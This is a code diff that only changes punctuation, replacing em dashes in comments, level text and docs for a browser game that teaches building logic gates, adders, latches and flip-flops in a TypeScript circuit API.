     allowed: ['Nand', 'Not', 'And', 'Or', 'Nor', 'Xor', 'Xnor'],
     stub: `// Ports, not switches. Every gate you have built is available.
 //
-// \`inputs\` and \`outputs\` are the circuit's edges — what it looks like from
+// \`inputs\` and \`outputs\` are the circuit's edges: what it looks like from
 // the outside. Wire them with \`inputs.a.to(...)\` and \`....to(outputs.out)\`.
 
 export default circuit('Xor2', {
@@ -385,7 +385,7 @@ export default circuit('Xor2', {
     inputs: ['a', 'b'],
     outputs: ['sum', 'carry'],
     allowed: ARITHMETIC_GATES,
-    stub: `// Adding two bits gives 0, 1 or 2 — and 2 does not fit in
+    stub: `// Adding two bits gives 0, 1 or 2, and 2 does not fit in
 // one bit, so the answer needs two lamps.
 //
 // You proved you could build these gates, so you have them
@@ -412,7 +412,7 @@ export default circuit('HalfAdder', {
     par: 2,
     outro: {
       headline: 'That is addition',
-      body: 'Sum is XOR, carry is AND, and together they add. It is called half an adder because it cannot take a carry coming in — which is the next problem, and the reason one of these is never enough.',
+      body: 'Sum is XOR, carry is AND, and together they add. It is called half an adder because it cannot take a carry coming in, which is the next problem, and the reason one of these is never enough.',
     },
   },
 
@@ -421,13 +421,13 @@ export default circuit('HalfAdder', {
     title: 'Full Adder',
     tagline: 'Add two bits and a carry coming in.',
     brief:
-      'The same sum, but with a carry arriving from the bit below. Do not build it out of gates — build it out of two of the half adders you just made.',
+      'The same sum, but with a carry arriving from the bit below. Do not build it out of gates; build it out of two of the half adders you just made.',
     target: 'FullAdder',
     inputs: ['a', 'b', 'cin'],
     outputs: ['sum', 'cout'],
     allowed: ARITHMETIC_GATES,
     stub: `// Your half adder, wrapped in ports so it can be used as a
-// component. That is what the last level was for — a circuit
+// component. That is what the last level was for: a circuit
 // with ports is one other circuits can build with.
 
 const HalfAdder = circuit('HalfAdder', {
@@ -446,7 +446,7 @@ const HalfAdder = circuit('HalfAdder', {
 // cin to that answer with the second.
 //
 // Either of those additions can carry, and the answer carries
-// out if either did — so you need one more gate for that.
+// out if either did, so you need one more gate for that.
 
 export default circuit('FullAdder', {
   nodes: {
@@ -485,7 +485,7 @@ export default circuit('FullAdder', {
     title: 'SR Latch',
     tagline: 'Remember a bit after the input goes away.',
     brief:
-      'Every circuit so far answered only to its switches. This one has to answer to what happened before: pull `s` low and the lamp comes on, pull `r` low and it goes off, and with both high it holds whatever it was last told. Read the steps left to right — the same inputs appear twice with different answers, and that is the whole point.',
+      'Every circuit so far answered only to its switches. This one has to answer to what happened before: pull `s` low and the lamp comes on, pull `r` low and it goes off, and with both high it holds whatever it was last told. Read the steps left to right: the same inputs appear twice with different answers, and that is the whole point.',
     target: 'Latch1',
     inputs: ['s', 'r'],
     outputs: ['q'],
@@ -528,7 +528,7 @@ export default circuit('Latch1', {
     par: 2,
     outro: {
       headline: 'It remembers',
-      body: "Two NANDs, each reading the other's answer. That loop is what every memory is made of — but it has a state you were told to avoid, and the next level gets rid of it.",
+      body: "Two NANDs, each reading the other's answer. That loop is what every memory is made of, but it has a state you were told to avoid, and the next level gets rid of it.",
     },
   },
 
@@ -547,7 +547,7 @@ export default circuit('Latch1', {
 //
 // The pair you built holds when both its inputs are high. So
 // the job of the two new gates is: when \`en\` is low, force
-// both high no matter what \`d\` is — and when \`en\` is high,
+// both high no matter what \`d\` is, and when \`en\` is high,
 // send \`d\` to one side and its opposite to the other.
 //
 // A NAND already gives you the opposite of something for
@@ -570,7 +570,7 @@ export default circuit('DLatch1', {
 });
 `,
     // Steps 2 and 5 carry identical inputs and demand different answers,
-    // which is the proof no combinational circuit can pass — without a repeat
+    // which is the proof no combinational circuit can pass, without a repeat
     // like that, `XNOR(d, en)` satisfies the whole table with no memory at
     // all. Step 1 stores deliberately, so the run does not depend on whatever
     // state the circuit powers up in.
@@ -615,7 +615,7 @@ export default circuit('DLatch1', {
 //
 // Your latch followed \`d\` the whole time \`en\` was high. A D
 // flip-flop only looks at \`d\` on a clock edge, and holds it
-// steady until the next one — so what it stores this tick is
+// steady until the next one, so what it stores this tick is
 // what \`d\` was last tick.
 //
 // Your latch could not do this. Wire its output back to its
@@ -670,7 +670,7 @@ export function nextLevel(id: string): Level | undefined {
 
 /**
  * Gates the player walks away from `level` holding that they did not have on
- * arrival — what the completion card announces as unlocked.
+ * arrival: what the completion card announces as unlocked.
  *
  * Normally that is whatever the next level adds. The first level is the
  * exception: its baseline is nothing at all, so the gate it hands over is its

--- a/apps/game/src/game/map-circuit.ts
+++ b/apps/game/src/game/map-circuit.ts
@@ -1,7 +1,7 @@
 /**
  * The campaign map, as an actual circuit.
  *
- * Not a drawing of one. `buildMapCircuit` returns a real `circuit()` — a
+ * Not a drawing of one. `buildMapCircuit` returns a real `circuit()`, a
  * `Switch` per level carrying whether you solved it, `And` gates wherever a
  * row depends on more than one level below it, and an `Led` per level whose
  * value *is* that level's unlock state. `simulateMap` then runs it on the same
@@ -11,7 +11,7 @@
  * So unlock logic is not code that mimics a circuit; it is a circuit. The
  * consequence that matters: when the campaign grows branches, "level 7 needs
  * both 5 and 6" stops being a rule someone has to implement and becomes an
- * `And` — one representation, which cannot disagree with itself.
+ * `And`, one representation, which cannot disagree with itself.
  *
  * This runs in the main frame, which is safe precisely because nothing here is
  * player source. The circuit is assembled through the typed API from `MAP_ROWS`;
@@ -37,7 +37,7 @@ const ALWAYS_ON = 'always_on';
  *
  * Row 0 is unlocked unconditionally, so it is driven by a `Constant`; every
  * later row is driven by the AND of the row beneath it, chained pairwise
- * because gates take two inputs. A row of one level needs no gate at all — the
+ * because gates take two inputs. A row of one level needs no gate at all; the
  * switch below drives the lamp directly.
  */
 export function buildMapCircuit() {
@@ -92,7 +92,7 @@ export function buildMapCircuit() {
 export interface MapState {
   /** Levels whose unlock lamp is lit. */
   unlocked: Set<string>;
-  /** Levels whose switch is on — the signal leaving them is live. */
+  /** Levels whose switch is on; the signal leaving them is live. */
   live: Set<string>;
 }
 

--- a/apps/game/src/game/map.ts
+++ b/apps/game/src/game/map.ts
@@ -1,7 +1,7 @@
 /**
  * The campaign as a map.
  *
- * `MAP_ROWS` is the campaign's shape, listed bottom to top — row 0 is where a
+ * `MAP_ROWS` is the campaign's shape, listed bottom to top; row 0 is where a
  * player starts and the last row is the end of the act. A row holds more than
  * one level when those levels are siblings rather than a sequence: Turing
  * Complete puts AND, NOR and OR side by side precisely so three levels read as
@@ -12,7 +12,7 @@
  * Order lives here rather than in `levels.ts` because it is presentation: a
  * level stays pure data that could be fetched as JSON, and the map decides how
  * that data is arranged. The cost of the split is drift, which is what
- * `__tests__/map.test.ts` exists to catch — every level appears exactly once,
+ * `__tests__/map.test.ts` exists to catch: every level appears exactly once,
  * and no row names a level that does not exist.
  */
 
@@ -55,8 +55,8 @@ export interface MapSection {
 }
 
 export const MAP_SECTIONS: MapSection[] = [
-  // One band from the first wire to the last gate. It was two — a short
-  // "First circuits" and then "Every gate from one" — which split a single
+  // One band from the first wire to the last gate. It was two: a short
+  // "First circuits" and then "Every gate from one", which split a single
   // idea in half and put a rule across the map two levels in, before the
   // player had done anything worth dividing.
   { label: 'Logic gates', startRow: 0 },
@@ -68,7 +68,7 @@ export const MAP_SECTIONS: MapSection[] = [
 /**
  * Layout constants. Node width is fixed so a row can be centred without
  * measuring the DOM, which keeps the graph identical on the server and the
- * client — React Flow renders during SSR here, and a layout that depended on
+ * client, because React Flow renders during SSR here, and a layout that depended on
  * measurement would jump on hydration.
  */
 export const NODE_WIDTH = 210;
@@ -121,8 +121,8 @@ export const SECTION_WIDTH = 760;
  * Vertical budget for a band, spent out of the space between two rows.
  *
  * `ROW_GAP - NODE_HEIGHT` is all there is between one row's card and the next
- * (currently 78px). A band claims `BOTTOM` beneath its lowest card — where the
- * label sits — and `TOP` above its highest, and whatever is left becomes the
+ * (currently 78px). A band claims `BOTTOM` beneath its lowest card (where the
+ * label sits) and `TOP` above its highest, and whatever is left becomes the
  * gap between adjacent bands. Overrun the budget and neighbouring bands
  * overlap instead of separating.
  */
@@ -138,7 +138,7 @@ const SECTION_PAD_BOTTOM = 30;
  *
  * `solved` is the set of completed level ids, read from stored progress by the
  * map page. It is empty for the first frame after mount, because storage can
- * only be read on the client — so this must be safe to call with nothing
+ * only be read on the client, so this must be safe to call with nothing
  * solved, which it is: every level renders as available.
  */
 export function buildMapGraph(solved: ReadonlySet<string> = new Set()): {
@@ -188,7 +188,7 @@ export function buildMapGraph(solved: ReadonlySet<string> = new Set()): {
   /**
    * Each band spans from the row it opens on up to the row below the next
    * band's start. Y grows downward while rows climb, so the band's *top* comes
-   * from its last row and its *bottom* from its first — inverted relative to
+   * from its last row and its *bottom* from its first, inverted relative to
    * how it reads.
    */
   const inRange = MAP_SECTIONS.filter((s) => s.startRow >= 0 && s.startRow < MAP_ROWS.length);

--- a/apps/game/src/game/runtime.ts
+++ b/apps/game/src/game/runtime.ts
@@ -2,7 +2,7 @@
  * The surface the grader needs from a simulator, and the sandbox adapter for it.
  *
  * The grader is written against this rather than `SandboxHandle` directly so it
- * can be run host-side in tests — which is what proves a level is solvable
+ * can be run host-side in tests, which is what proves a level is solvable
  * before anyone is asked to solve it. The browser passes `sandboxRuntime`; the
  * test suite passes a local one built on `executeCircuitCode`.
  */
@@ -40,7 +40,7 @@ export interface GradeRuntime {
    * Keys in and out are the level's BARE signal names. The contract has to say
    * so: the sandbox reports top-level ports namespaced under `__top__` while
    * `@simten/core/sim` returns them bare, and leaving that unstated let the two
-   * implementations disagree silently — grading read `undefined` for every
+   * implementations disagree silently: grading read `undefined` for every
    * output and scored it 0, which passes any row that expects 0.
    *
    * A name resolves against either circuit shape; see `resolveOutput`.
@@ -55,7 +55,7 @@ const TOP_LEVEL_PREFIX = '__top__.';
  * Find one output signal in a bag of port values.
  *
  * A signal named `out` is either a top-level output port (`__top__.out`) or the
- * input of a display node of that name (`out.in`) — the two shapes a level can
+ * input of a display node of that name (`out.in`), the two shapes a level can
  * take. Ports win, so a circuit with both is unambiguous.
  *
  * Driving inputs needs no equivalent: the simulator's `setNode` already tries a

--- a/apps/game/src/game/solutions/index.ts
+++ b/apps/game/src/game/solutions/index.ts
@@ -1,7 +1,7 @@
 /**
  * Reference solutions, one per level id.
  *
- * These are the validation gate's known-good answers — `__tests__/levels.test.ts`
+ * These are the validation gate's known-good answers; `__tests__/levels.test.ts`
  * asserts every one passes its level, and that the set matches `LEVELS` exactly.
  *
  * Real `.ts` files rather than string literals, loaded as text with Vite's
@@ -16,14 +16,14 @@
  *
  * ⚠️ `?raw` is a Vite feature. Vitest resolves it because it runs through Vite's
  * pipeline; a bare `tsx` script importing this module would fail with "does not
- * provide an export named 'default'". Nothing in the repo does that today —
+ * provide an export named 'default'". Nothing in the repo does that today,
  * `check-exports.ts` is the only `tsx` entry point and it reads package.json
- * files — but it is the reason to reach for vitest rather than tsx when poking
+ * files, but it is the reason to reach for vitest rather than tsx when poking
  * at these.
  *
  * ⚠️ These are the answers, and this module ships to the browser. Anyone can
  * read them out of the bundle. The drilldown now draws the player's own draft
- * where there is one, so this is only the fallback for levels never opened —
+ * where there is one, so this is only the fallback for levels never opened,
  * the spoiler is smaller than it was, but it is still there. Making it
  * test-only means finding something else for an unopened level to inspect to.
  */

--- a/apps/game/src/game/solutions/toggle.ts
+++ b/apps/game/src/game/solutions/toggle.ts
@@ -5,7 +5,7 @@ import { DFlipFlop, Led } from '@simten/core/std';
 
 export const Toggle1 = circuit('Toggle1', {
   // No gate at all. `q_bar` is already the opposite of what is stored, so
-  // wiring it to `d` says "next tick, hold the opposite of this" — which is a
+  // wiring it to `d` says "next tick, hold the opposite of this", which is a
   // circuit that can never settle.
   nodes: { dff: DFlipFlop(), q: Led },
   connect: ({ nodes: { dff, q } }) => [dff.q_bar.to(dff.d), dff.q.to(q.in)],

--- a/apps/game/src/game/storage.ts
+++ b/apps/game/src/game/storage.ts
@@ -5,12 +5,12 @@
  * storage layer can be swapped for D1 later without every caller learning
  * about it. Three things every caller would otherwise get wrong:
  *
- *   SSR      — this app server-renders, so `window` is not always there.
+ *   SSR      : this app server-renders, so `window` is not always there.
  *              Reads return the fallback rather than throwing.
- *   parsing  — stored JSON is user-editable and survives deploys, so a parse
+ *   parsing  : stored JSON is user-editable and survives deploys, so a parse
  *              failure is expected input, not an exception. Bad data reads as
  *              absent.
- *   version  — every record carries one, so a future format change can be
+ *   version  : every record carries one, so a future format change can be
  *              detected instead of silently misread as the current shape.
  *
  * Keys are namespaced `simten:game:*` because this origin is shared with the
@@ -67,7 +67,7 @@ export const INTRO_SEEN_KEY = 'simten:game:intro-seen';
  *
  * Separate from `INTRO_SEEN_KEY`, which is the whole game's front door. This is
  * per level and per concept: a band that introduces something the player has
- * never met — a clock, say — says so once and then stops.
+ * never met (a clock, say) says so once and then stops.
  */
 export const LEVEL_INTROS_KEY = 'simten:game:level-intros-seen';
 
@@ -88,12 +88,12 @@ export type Progress = Record<string, LevelProgress>;
 /**
  * Two records, not one, because they are different kinds of data.
  *
- * A draft is whatever is in the editor — mid-thought, broken, or finished. It
+ * A draft is whatever is in the editor: mid-thought, broken, or finished. It
  * exists so a refresh does not cost you your work. Progress is a flag and a
  * score: it is what the map's green nodes, the lit wires, `ENFORCE_LOCKING`
  * and the completion card read, and none of them need a line of source.
  *
- * Progress deliberately holds no source yet. Nothing would read it — no level
+ * Progress deliberately holds no source yet. Nothing would read it; no level
  * imports another level's circuit today, since the full adder's half adder
  * lives in its own stub. When composition lands, `LevelProgress` gains the
  * source that last *passed*, and downstream levels read that rather than the
@@ -138,7 +138,7 @@ export function readProgress(): Progress {
 }
 
 /**
- * Record a pass. The latest one wins rather than the cheapest — the score
+ * Record a pass. The latest one wins rather than the cheapest; the score
  * describes the circuit you have, and a player who refactors to something
  * slower should see that rather than a number they can no longer reproduce.
  */

--- a/apps/game/src/game/types.ts
+++ b/apps/game/src/game/types.ts
@@ -7,7 +7,7 @@
  * to R2 later and be fetched as plain JSON without shipping executable content
  * to the browser.
  *
- * Signals are named, not typed as ports. That is deliberate — early levels are
+ * Signals are named, not typed as ports. That is deliberate: early levels are
  * self-contained circuits wiring `Switch` nodes to `Led` nodes, and later ones
  * declare real top-level ports once abstraction has been taught. The grader
  * resolves a name against either shape (see `runtime.ts`), so one format spans
@@ -20,7 +20,7 @@
  * One row of the truth table. `inputs` are driven onto the named signals;
  * every key in `expect` is compared against the signal of that name.
  *
- * Values are 0/1 numbers rather than booleans — the simulator reports bits as
+ * Values are 0/1 numbers rather than booleans, since the simulator reports bits as
  * numbers, and one representation avoids a coercion layer in the grader.
  */
 export interface Vector {
@@ -29,14 +29,14 @@ export interface Vector {
 }
 
 export interface Level {
-  /** Stable URL segment. Public surface once shared — do not rename. */
+  /** Stable URL segment. Public surface once shared; do not rename. */
   id: string;
   title: string;
   /**
    * One line, in the header beside the title: what this level is about.
    *
    * Separate from `brief` because the two are read at different moments. The
-   * header is a glance while you work, and it truncates — putting the problem
+   * header is a glance while you work, and it truncates, so putting the problem
    * statement there meant the first thing on screen was a half-sentence of
    * instructions. This says what you are making; `brief` says what counts as
    * done.
@@ -61,7 +61,7 @@ export interface Level {
   outputs: string[];
   /**
    * Primitives the solution may be built from. Checked after elaboration, so it
-   * constrains what the answer is *made of*, not what the source mentions — a
+   * constrains what the answer is *made of*, not what the source mentions; a
    * helper circuit built from allowed primitives is fine.
    *
    * This list also defines the score: gates used is the count of nodes whose
@@ -73,7 +73,7 @@ export interface Level {
    * A one-time explainer, shown on first arrival at this level.
    *
    * For a band that introduces something the player has never met and cannot
-   * discover from the brief — the clock arrives this way, with no wire to
+   * discover from the brief; the clock arrives this way, with no wire to
    * connect and no gate to place, so nothing on screen would otherwise account
    * for it. Shown once, then never again.
    */
@@ -82,14 +82,14 @@ export interface Level {
     body: string;
     /**
      * Somewhere to read more. Kept as data rather than markup so a level stays
-     * plain JSON — see the note at the top of this file.
+     * plain JSON; see the note at the top of this file.
      */
     link?: { label: string; href: string };
   };
   /** Starting source in the editor. */
   stub: string;
   /**
-   * The truth table. Exhaustive where the input space allows it — every
+   * The truth table. Exhaustive where the input space allows it: every
    * combinational level shipped so far is small enough that it is.
    *
    * On a `sequential` level these are ordered steps, not independent cases, and
@@ -99,7 +99,7 @@ export interface Level {
   /**
    * Does this level's answer have memory?
    *
-   * The grader needs no help — it drives one vector per clock tick and does not
+   * The grader needs no help; it drives one vector per clock tick and does not
    * reset between them, so state already carries. This exists for the spec
    * panel, which otherwise presents ordered steps as an unordered truth table
    * and tells the player the opposite of the lesson: on a latch the same inputs
@@ -140,5 +140,5 @@ export type GradeFailure =
 export type GradeResult =
   | { status: 'pass'; gates: number }
   | { status: 'fail'; failure: GradeFailure }
-  /** Compile error, sandbox error — anything that is not a verdict on the design. */
+  /** Compile error, sandbox error: anything that is not a verdict on the design. */
   | { status: 'error'; message: string };

--- a/apps/game/src/game/useVictoryRun.ts
+++ b/apps/game/src/game/useVictoryRun.ts
@@ -2,14 +2,14 @@
  * The moment a level is solved.
  *
  * Rather than asserting "correct", it drives the player's own circuit through
- * the truth table one row at a time — the harness switches flip, the LED
+ * the truth table one row at a time: the harness switches flip, the LED
  * lights, and each row ticks off as it passes. The proof is the machine
  * running, which is the thing they actually built.
  *
  * The harness names each Switch node after the port it feeds
  * (auto-harness.ts:70), so a vector's input names are already the node ids.
  *
- * Runs are cancellable by token because the source can change mid-sequence —
+ * Runs are cancellable by token because the source can change mid-sequence,
  * an edit invalidates the verdict, and a half-finished run writing to state
  * afterwards would leave rows lit under a circuit that no longer passes.
  */
@@ -23,7 +23,7 @@ const STEP_MS = 320;
 export interface VictoryRun {
   /** Row currently being driven, or null when not mid-run. */
   active: number | null;
-  /** Rows proven so far — drives the ticks. */
+  /** Rows proven so far; drives the ticks. */
   proven: number;
   /** True once every row has been driven. */
   complete: boolean;
@@ -75,8 +75,8 @@ export function useVictoryRun(
         // Then a clock edge, exactly as the grader does for every vector.
         //
         // Driving inputs propagates but does not advance a clock, so without
-        // this a clocked circuit would sit frozen while the grader — which
-        // ticks — passed it. The run would contradict the verdict, and it would
+        // this a clocked circuit would sit frozen while the grader, which
+        // ticks, passed it. The run would contradict the verdict, and it would
         // read as a broken animation rather than a missing edge. Unconditional
         // rather than keyed off `sequential`, because matching the grader for
         // every level is what stops the two drifting apart again; on a

--- a/apps/game/src/routes/$levelId.tsx
+++ b/apps/game/src/routes/$levelId.tsx
@@ -1,8 +1,8 @@
 /**
  * A level.
  *
- * Laid out like simten.dev/circuit on purpose — full viewport, its own top bar,
- * resizable panels — because it is the same product and should not read as a
+ * Laid out like simten.dev/circuit on purpose: full viewport, its own top bar,
+ * resizable panels, because it is the same product and should not read as a
  * different site. Three panels rather than the editor's two: the brief, the
  * code, and the circuit that code describes.
  *
@@ -59,7 +59,7 @@ import { SITE_URL } from './__root';
  * Writing on every keystroke means a JSON parse, a spread and a serialise per
  * character, for a record that only matters when the tab goes away. Long enough
  * to coalesce a burst of typing, short enough that no realistic pause loses
- * work — and the pending write is flushed on unmount regardless, so leaving the
+ * work, and the pending write is flushed on unmount regardless, so leaving the
  * page mid-keystroke is safe.
  */
 const DRAFT_DEBOUNCE_MS = 400;
@@ -117,7 +117,7 @@ export const Route = createFileRoute('/$levelId')({
  * Remount the level on every id change.
  *
  * TanStack reuses one component instance across `$levelId`, and almost all of
- * this screen's state is seeded from the level — `useState(level.stub)` runs
+ * this screen's state is seeded from the level; `useState(level.stub)` runs
  * its initialiser only on mount. Without the key, clicking "Next" swapped the
  * title, brief and truth table while leaving the previous level's solution in
  * the editor, its circuit on the canvas, and its SOLVED verdict in the panel.
@@ -128,13 +128,13 @@ export const Route = createFileRoute('/$levelId')({
  */
 /**
  * The line the player's own work starts on, when the stub hands them a
- * finished component to build with — otherwise `null`.
+ * finished component to build with, otherwise `null`.
  *
  * The full adder is given a half adder, and landing on that makes the level
  * look like it opens with someone else's code. But most stubs open with
  * comments that *are* the instructions, and scrolling past those would hide the
- * hint. So this keys off structure — is there a circuit defined above the
- * target? — rather than a flag somebody has to remember to set.
+ * hint. So this keys off structure (is there a circuit defined above the
+ * target?) rather than a flag somebody has to remember to set.
  */
 export function givenPreambleEnd(lines: string[]): number | null {
   const target = lines.findIndex((l) => l.startsWith('export default circuit('));
@@ -163,7 +163,7 @@ function PlayLevel({ level }: { level: Level }) {
    * Monaco renders a placeholder on the server and never puts `source` in the
    * markup, so the server and client agree on the DOM whatever this returns.
    * Seeding after mount would instead hand the editor the stub first and swap
-   * it, which flashes and — worse — makes the first change event carry the stub.
+   * it, which flashes and, worse, makes the first change event carry the stub.
    *
    * The route remounts per level via `key`, so this runs again on every
    * navigation rather than sticking on the level it first mounted with.
@@ -230,7 +230,7 @@ function PlayLevel({ level }: { level: Level }) {
   );
 
   // Preview the circuit the source describes. Pinned to the level's target by
-  // name — the default picks the last circuit defined, which would follow a
+  // name; the default picks the last circuit defined, which would follow a
   // player's helper instead of their answer. Same reason the grader does it.
   const select = useCallback(
     (circuits: { name: string }[]) =>
@@ -242,18 +242,18 @@ function PlayLevel({ level }: { level: Level }) {
   );
 
   // autoHarness wraps top-level ports in Switch/Led nodes, so the preview is
-  // playable — click a switch, watch the LED — before ever pressing Submit.
+  // playable (click a switch, watch the LED) before ever pressing Submit.
   // Without it there is nothing to click and nothing to see: the canvas
   // projection only walks `circuit.nodes`, so a level's inputs and outputs are
   // not drawn at all and a one-gate answer renders as a gate with no wires.
   //
   // It is not a commitment. `autoHarness` returns the circuit untouched when it
   // declares no top-level ports (auto-harness.ts:23), so a level that wants the
-  // raw internals shown just authors a self-contained circuit — no flag to flip.
+  // raw internals shown just authors a self-contained circuit, with no flag to flip.
   //
   // The trade it does make: a circuit WITH ports renders as one `dut` box, so
   // the player's own gates sit one level down. The canvas already supports
-  // getting there — the node reads "double-click to inspect".
+  // getting there; the node reads "double-click to inspect".
   const preview = useCompiledCircuit(source, {
     slot: 'preview',
     select: select as never,
@@ -268,7 +268,7 @@ function PlayLevel({ level }: { level: Level }) {
    * Gates in the preview that this level forbids.
    *
    * The editor filter only removes the type declarations, so a disallowed gate
-   * is a red squiggle and nothing more — the sandbox still executes it, and the
+   * is a red squiggle and nothing more; the sandbox still executes it, and the
    * canvas happily drew a component the level bans. That left the diagram
    * looking like the authority while Submit disagreed.
    *
@@ -280,11 +280,11 @@ function PlayLevel({ level }: { level: Level }) {
    * The last circuit that used only permitted gates.
    *
    * While a forbidden gate is present the canvas shows this instead of the
-   * current netlist, so a banned gate simply never appears — no banner, no
+   * current netlist, so a banned gate simply never appears: no banner, no
    * fanfare. The editor already squiggles it; the diagram just declines to
    * pretend it is real, and stops updating until the gate is gone.
    *
-   * A ref rather than state — it is a cache of a render output, and setting
+   * A ref rather than state: it is a cache of a render output, and setting
    * state from render to track it would just loop.
    */
   const lastPermitted = useRef<{
@@ -326,7 +326,7 @@ function PlayLevel({ level }: { level: Level }) {
       const verdict = await grade(sandboxRuntime(sandbox), level, source);
       setResult(verdict);
       setCompleteDismissed(false);
-      // Submit is a request for a verdict, so show it — hidden, the spec sheet
+      // Submit is a request for a verdict, so show it; hidden, the spec sheet
       // swallowed both the failure message and the whole victory run.
       setSpecOpen(true);
       if (verdict.status === 'pass') {
@@ -405,7 +405,7 @@ function PlayLevel({ level }: { level: Level }) {
             </button>
           )}
           {/* The wordmark also goes back, but that is a convention rather than
-              a signpost — this one says where it leads. */}
+              a signpost, and this one says where it leads. */}
           <Link
             to="/"
             title="Back to the map"
@@ -415,7 +415,7 @@ function PlayLevel({ level }: { level: Level }) {
             <Network className="h-3.5 w-3.5 -rotate-90" />
             Map
           </Link>
-          {/* Drafts persist, so the stub is otherwise gone for good — and a
+          {/* Drafts persist, so the stub is otherwise gone for good, and a
               player who deletes half of a given preamble has no way back to a
               level that compiles. Monaco keeps its undo stack across this, so
               a misclick is one ⌘Z rather than a lost solution. */}
@@ -486,7 +486,7 @@ function PlayLevel({ level }: { level: Level }) {
                 }}
               />
             </div>
-            {/* Diagnostics live under the editor, never over the canvas — a
+            {/* Diagnostics live under the editor, never over the canvas; a
               parse error mid-keystroke must not blank the diagram. A forbidden
               gate is the same class of message, so it lands here too: the
               canvas keeps showing the last circuit that compiled, which is
@@ -513,7 +513,7 @@ function PlayLevel({ level }: { level: Level }) {
               showPortLabels
               // Re-lay out on every change. The default only re-runs the
               // layout when nodes appear or disappear, so adding the last
-              // wire — which changes no nodes — left the lamp where it had
+              // wire, which changes no nodes, left the lamp where it had
               // been while unconnected.
               autoLayout
               // The harness switches are clickable, so the player can drive
@@ -539,7 +539,7 @@ function PlayLevel({ level }: { level: Level }) {
         flip-flop early gets the controls, and a sequential level opened on a
         blank stub does not get an inert row of buttons.
 
-        It sits at the foot of the page and the spec sheet rises above it —
+        It sits at the foot of the page and the spec sheet rises above it,
         see the sheet's `bottom` offset below. Without that the sheet covered
         it: the controls rendered, on screen, and unclickable, with the spec
         open by default.
@@ -578,7 +578,7 @@ function PlayLevel({ level }: { level: Level }) {
       )}
 
       {/* Non-modal so the editor and canvas keep working behind it, and the
-          overlay is off — it is `fixed inset-0` and would swallow every click
+          overlay is off; it is `fixed inset-0` and would swallow every click
           whatever the modal setting says. Outside interaction does not dismiss
           it either: clicking a switch is not a request to close the spec.
           Focus stays where it was, so opening this never interrupts typing. */}
@@ -587,7 +587,7 @@ function PlayLevel({ level }: { level: Level }) {
       {result?.status === 'pass' && (
         <LevelComplete
           // Held back until the victory run has finished demonstrating the
-          // circuit — the run is the proof, this is the receipt.
+          // circuit: the run is the proof, this is the receipt.
           open={victory.complete && !completeDismissed}
           onOpenChange={(o) => setCompleteDismissed(!o)}
           level={level}

--- a/apps/game/src/routes/__root.tsx
+++ b/apps/game/src/routes/__root.tsx
@@ -53,7 +53,7 @@ export const Route = createRootRoute({
 });
 
 /**
- * The level page is a tool screen — full viewport, its own top bar, no site
+ * The level page is a tool screen: full viewport, its own top bar, no site
  * nav. It opts out with `staticData: { skipDefaultChrome: true }`, the same
  * mechanism apps/web uses for /circuit.
  */

--- a/apps/game/src/routes/index.tsx
+++ b/apps/game/src/routes/index.tsx
@@ -1,5 +1,5 @@
 /**
- * The campaign map — the front door and the only way in.
+ * The campaign map: the front door and the only way in.
  *
  * Full-bleed under a thin header: the canvas needs the room, and a map that
  * scrolls inside a narrow column is a list with extra steps. There is no list
@@ -38,7 +38,7 @@ function MapPage() {
    * Saved state, read after mount rather than during render.
    *
    * This page server-renders, and unlike the editor its storage-derived state
-   * is visible DOM — a solved level is a green card and a live wire. Reading in
+   * is visible DOM: a solved level is a green card and a live wire. Reading in
    * an initialiser would render one thing on the server and another on the
    * client and lose the hydration argument. The map is honest for one frame
    * instead: nothing solved, everything available.

--- a/apps/game/src/styles.css
+++ b/apps/game/src/styles.css
@@ -1,7 +1,7 @@
 /**
  * Tokens, fonts and Tailwind wiring.
  *
- * The palette lives in @simten/ui so this app and simten.dev cannot drift —
+ * The palette lives in @simten/ui so this app and simten.dev cannot drift,
  * they are the same product and a divergent border colour reads as two
  * different sites. Only the things that genuinely belong to this app stay
  * here: the font files it serves, and the source globs Tailwind must scan.
@@ -18,7 +18,7 @@
 @source "../../../packages/embed/src/**/*.tsx";
 @source "./**/*.{ts,tsx}";
 
-/* Served from this app's own public/ — a separate origin needs its own copy. */
+/* Served from this app's own public/; a separate origin needs its own copy. */
 @font-face {
   font-family: 'Geist';
   src: url('/fonts/Geist-Variable.woff2') format('woff2-variations');

--- a/apps/web/content/docs/api-reference.mdx
+++ b/apps/web/content/docs/api-reference.mdx
@@ -61,7 +61,7 @@ circuit(name, {
 
 ## Connections
 
-The `connect` function receives a single object with `inputs`, `outputs`, and `nodes` — the same shape as the config. Destructure node names inline for terseness, or access them as `nodes.xor1` etc. Call `.to()` to wire ports:
+The `connect` function receives a single object with `inputs`, `outputs`, and `nodes`, the same shape as the config. Destructure node names inline for terseness, or access them as `nodes.xor1` etc. Call `.to()` to wire ports:
 
 ```typescript
 connect: ({ inputs, outputs, nodes: { xor1, and1 } }) => [
@@ -76,7 +76,7 @@ Connections are directional: source (left) drives target(s) (right). A port can 
 
 ## Node Parameters
 
-Parameterized components are factories — call them inline to specialize per-instance args:
+Parameterized components are factories: call them inline to specialize per-instance args:
 
 ```typescript
 nodes: {
@@ -87,9 +87,9 @@ nodes: {
 },
 ```
 
-A bare `Adder()` with no args is allowed and uses the factory's defaults; bare `Adder` (without parens) is a TS error — parameterized components must always be called. Singletons (logic gates, `Led`, all `RV32I_*`, etc.) are not parameterized and stay as bare references.
+A bare `Adder()` with no args is allowed and uses the factory's defaults; bare `Adder` (without parens) is a TS error, because parameterized components must always be called. Singletons (logic gates, `Led`, all `RV32I_*`, etc.) are not parameterized and stay as bare references.
 
-**The option name always matches what the component's `state:` or `eval:` destructure uses.** That's the only rule — there's no separate `initial`/`init` keyword to memorize. Examples:
+**The option name always matches what the component's `state:` or `eval:` destructure uses.** That's the only rule; there's no separate `initial`/`init` keyword to memorize. Examples:
 
 | Component | State / eval declares | Factory option |
 |-----------|----------------------|----------------|
@@ -103,7 +103,7 @@ Common parameters across the stdlib:
 | Parameter | Used by | Description |
 |-----------|---------|-------------|
 | `width` | Adder, Subtractor, Comparator, Mux, BusAnd/Or/Xor, LeftShifter, RightShifter, Register | Bus width (default: 8) |
-| `value` | Constant, Input, Switch, Button, Register, DFlipFlop | Fixed or initial state value (matches state/eval field). For Register and DFlipFlop this is also the reset target — when the exporter's auto-plumbed `rst_n` goes low, the register snaps back to `value`. |
+| `value` | Constant, Input, Switch, Button, Register, DFlipFlop | Fixed or initial state value (matches state/eval field). For Register and DFlipFlop this is also the reset target: when the exporter's auto-plumbed `rst_n` goes low, the register snaps back to `value`. |
